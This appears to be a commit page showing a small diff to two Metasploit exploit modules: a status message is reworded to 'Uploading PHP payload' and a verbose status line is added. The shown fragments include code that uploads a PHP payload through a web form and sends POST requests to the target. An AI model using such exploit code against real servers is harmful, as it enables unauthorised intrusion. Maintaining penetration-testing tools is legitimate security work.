More desc fixes, add a vprint to give a hint
parent
d34020115a
commit
7e2a9a7072
|
@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
|
data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
|
||||||
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
|
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
|
||||||
|
|
||||||
print_status("#{peer} - Uploading malicious file...")
|
print_status("#{peer} - Uploading PHP payload...")
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => normalize_uri(target_uri.path, 'upload.php'),
|
'uri' => normalize_uri(target_uri.path, 'upload.php'),
|
||||||
|
|
|
@ -76,6 +76,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
uri = normalize_uri(target_uri.path.to_s, "index.php")
|
uri = normalize_uri(target_uri.path.to_s, "index.php")
|
||||||
|
|
||||||
|
vprint_status("#{peer} - Sending request to #{uri}.")
|
||||||
|
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
|
|
Loading…
Reference in New Issue